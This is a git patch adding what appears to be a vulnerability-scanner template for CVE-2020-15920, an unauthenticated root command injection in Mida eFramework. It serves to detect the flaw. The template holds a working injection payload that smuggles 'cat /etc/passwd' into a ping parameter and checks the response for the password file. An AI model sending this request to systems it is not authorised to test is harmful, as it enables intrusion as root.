From 455a98f771a8a56f80cc83e90fbe1709c293a413 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <dwi.siswanto98@gmail.com>
Date: Wed, 2 Sep 2020 01:38:31 +0700
Subject: [PATCH] :fire: Add CVE-2020-15920

---
 cves/CVE-2020-15920.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 cves/CVE-2020-15920.yaml

diff --git a/cves/CVE-2020-15920.yaml b/cves/CVE-2020-15920.yaml
new file mode 100644
index 0000000000..55986cde7e
--- /dev/null
+++ b/cves/CVE-2020-15920.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-15920
+
+info:
+  name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php'
+  author: dwisiswant0
+  severity: critical
+  description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
+
+  # References:
+  # - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
+        part: body